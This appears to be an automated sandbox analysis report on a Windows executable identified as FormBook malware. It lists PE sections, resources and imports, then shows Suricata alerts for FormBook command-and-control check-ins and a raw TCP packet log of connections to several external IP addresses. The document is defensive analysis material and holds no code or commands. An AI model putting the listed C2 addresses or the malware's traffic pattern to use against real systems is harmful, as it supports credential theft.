                .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc0xd40000x5a0840x5a20093f46011492adb707c438e83845c59cfFalse0.9267239511095701data7.892962717251277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x12f0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                RT_RCDATA0xdc7b80x5131adata1.0003337643202934
                RT_GROUP_ICON0x12dad40x76dataEnglishGreat Britain0.6610169491525424
                RT_GROUP_ICON0x12db4c0x14dataEnglishGreat Britain1.25
                RT_GROUP_ICON0x12db600x14dataEnglishGreat Britain1.15
                RT_GROUP_ICON0x12db740x14dataEnglishGreat Britain1.25
                RT_VERSION0x12db880x10cdataEnglishGreat Britain0.6007462686567164
                RT_MANIFEST0x12dc940x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                Imports

                DLLImport
                WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                PSAPI.DLLGetProcessMemoryInfo
                IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                UxTheme.dllIsThemeActive
                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                Possible Origin

                Language of compilation systemCountry where language is spokenMap
                EnglishGreat Britain

                Network Behavior

                Suricata IDS Alerts

                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                2024-08-23T04:20:41.281611+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975980192.168.2.4199.192.19.19
                2024-08-23T04:21:00.064857+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976580192.168.2.4213.145.228.16
                2024-08-23T04:18:27.482705+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514973680192.168.2.45.44.111.162
                2024-08-23T04:19:44.582620+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974980192.168.2.443.252.167.188
                2024-08-23T04:19:15.545135+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974380192.168.2.4208.91.197.27
                2024-08-23T04:20:54.962325+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976380192.168.2.4213.145.228.16
                2024-08-23T04:21:13.440847+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976980192.168.2.491.195.240.19
                2024-08-23T04:19:36.939695+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974680192.168.2.443.252.167.188
                2024-08-23T04:18:43.216056+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973780192.168.2.4217.160.0.106
                2024-08-23T04:20:08.147806+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975580192.168.2.423.251.54.212
                2024-08-23T04:21:08.372143+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976780192.168.2.491.195.240.19
                2024-08-23T04:20:10.695239+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975680192.168.2.423.251.54.212
                2024-08-23T04:19:39.479593+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974780192.168.2.443.252.167.188
                2024-08-23T04:21:33.147887+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977280192.168.2.4172.67.210.102
                2024-08-23T04:19:52.981754+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975180192.168.2.4194.9.94.85
                2024-08-23T04:19:58.472511+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975380192.168.2.4194.9.94.85
                2024-08-23T04:21:05.837189+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976680192.168.2.491.195.240.19
                2024-08-23T04:20:43.986058+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976080192.168.2.4199.192.19.19
                2024-08-23T04:20:57.530827+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976480192.168.2.4213.145.228.16
                2024-08-23T04:19:50.401644+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975080192.168.2.4194.9.94.85
                2024-08-23T04:19:55.506439+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975280192.168.2.4194.9.94.85
                2024-08-23T04:20:33.106164+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514975780192.168.2.423.251.54.212
                2024-08-23T04:20:52.510744+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976280192.168.2.4213.145.228.16
                2024-08-23T04:18:48.408334+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973980192.168.2.4217.160.0.106
                2024-08-23T04:19:42.073478+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974880192.168.2.443.252.167.188
                2024-08-23T04:19:18.178646+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974480192.168.2.4208.91.197.27
                2024-08-23T04:20:39.664204+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975880192.168.2.4199.192.19.19
                2024-08-23T04:21:10.944772+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314976880192.168.2.491.195.240.19
                2024-08-23T04:17:48.756945+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514977380192.168.2.4172.67.210.102
                2024-08-23T04:19:13.014934+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314974280192.168.2.4208.91.197.27
                2024-08-23T04:21:28.069753+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977080192.168.2.4172.67.210.102
                2024-08-23T04:21:30.603596+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314977180192.168.2.4172.67.210.102
                2024-08-23T04:18:51.068512+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974080192.168.2.4217.160.0.106
                2024-08-23T04:20:05.444683+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314975480192.168.2.423.251.54.212
                2024-08-23T04:18:45.757577+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314973880192.168.2.4217.160.0.106
                2024-08-23T04:20:46.356118+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514976180192.168.2.4199.192.19.19
                2024-08-23T04:19:22.189090+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514974580192.168.2.4208.91.197.27

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Aug 23, 2024 04:18:26.793268919 CEST4973680192.168.2.45.44.111.162
                Aug 23, 2024 04:18:26.798206091 CEST80497365.44.111.162192.168.2.4
                Aug 23, 2024 04:18:26.798475027 CEST4973680192.168.2.45.44.111.162
                Aug 23, 2024 04:18:26.800393105 CEST4973680192.168.2.45.44.111.162
                Aug 23, 2024 04:18:26.805284977 CEST80497365.44.111.162192.168.2.4
                Aug 23, 2024 04:18:27.482528925 CEST80497365.44.111.162192.168.2.4
                Aug 23, 2024 04:18:27.482589960 CEST80497365.44.111.162192.168.2.4
                Aug 23, 2024 04:18:27.482705116 CEST4973680192.168.2.45.44.111.162
                Aug 23, 2024 04:18:27.485311985 CEST4973680192.168.2.45.44.111.162
                Aug 23, 2024 04:18:27.490242958 CEST80497365.44.111.162192.168.2.4
                Aug 23, 2024 04:18:42.561813116 CEST4973780192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:42.567975044 CEST8049737217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:42.568057060 CEST4973780192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:42.569592953 CEST4973780192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:42.575620890 CEST8049737217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:43.215931892 CEST8049737217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:43.215981960 CEST8049737217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:43.216056108 CEST4973780192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:44.085679054 CEST4973780192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:45.104232073 CEST4973880192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:45.109286070 CEST8049738217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:45.109375954 CEST4973880192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:45.111944914 CEST4973880192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:45.116822958 CEST8049738217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:45.757328987 CEST8049738217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:45.757520914 CEST8049738217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:45.757576942 CEST4973880192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:46.616367102 CEST4973880192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:47.634521008 CEST4973980192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:47.760646105 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.760787964 CEST4973980192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:47.762895107 CEST4973980192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:47.767767906 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.767858028 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.767887115 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.767935038 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.767961979 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.767992020 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.768136978 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.768163919 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:47.768191099 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:48.408241034 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:48.408277988 CEST8049739217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:48.408334017 CEST4973980192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:49.272648096 CEST4973980192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:50.291173935 CEST4974080192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:50.296211004 CEST8049740217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:50.296318054 CEST4974080192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:50.297837019 CEST4974080192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:50.302719116 CEST8049740217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:51.068322897 CEST8049740217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:51.068382978 CEST8049740217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:51.068412066 CEST8049740217.160.0.106192.168.2.4
                Aug 23, 2024 04:18:51.068511963 CEST4974080192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:51.071250916 CEST4974080192.168.2.4217.160.0.106
                Aug 23, 2024 04:18:51.076122999 CEST8049740217.160.0.106192.168.2.4
                Aug 23, 2024 04:19:12.543663979 CEST4974280192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:12.548429966 CEST8049742208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:12.548500061 CEST4974280192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:12.550000906 CEST4974280192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:12.555598974 CEST8049742208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:13.014857054 CEST8049742208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:13.014934063 CEST4974280192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:14.062767982 CEST4974280192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:14.067703009 CEST8049742208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:15.072417021 CEST4974380192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:15.077240944 CEST8049743208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:15.077349901 CEST4974380192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:15.078872919 CEST4974380192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:15.083606958 CEST8049743208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:15.544964075 CEST8049743208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:15.545135021 CEST4974380192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:16.585267067 CEST4974380192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:16.592196941 CEST8049743208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.603682041 CEST4974480192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:17.608678102 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.608767033 CEST4974480192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:17.611164093 CEST4974480192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:17.616004944 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616017103 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616050005 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616059065 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616096020 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616244078 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616252899 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616301060 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:17.616308928 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:18.178447962 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:18.178646088 CEST4974480192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:19.116550922 CEST4974480192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:19.121505976 CEST8049744208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:20.134557962 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:20.139539957 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:20.142462969 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:20.144239902 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:20.152019024 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.188949108 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.188982010 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.188999891 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189014912 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189033031 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189047098 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189060926 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189074993 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189088106 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189090014 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.189105988 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.189125061 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.189163923 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.195242882 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.195259094 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.195274115 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.195368052 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.276439905 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276458979 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276473999 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276575089 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276592016 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.276732922 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276890039 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276905060 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276918888 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.276937008 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.276966095 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.277503014 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.277518988 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.277534008 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.277570009 CEST4974580192.168.2.4208.91.197.27
                Aug 23, 2024 04:19:22.277671099 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.278646946 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.278661966 CEST8049745208.91.197.27192.168.2.4
                Aug 23, 2024 04:19:22.278676033 CEST8049745208.91.197.27192.168.2.4
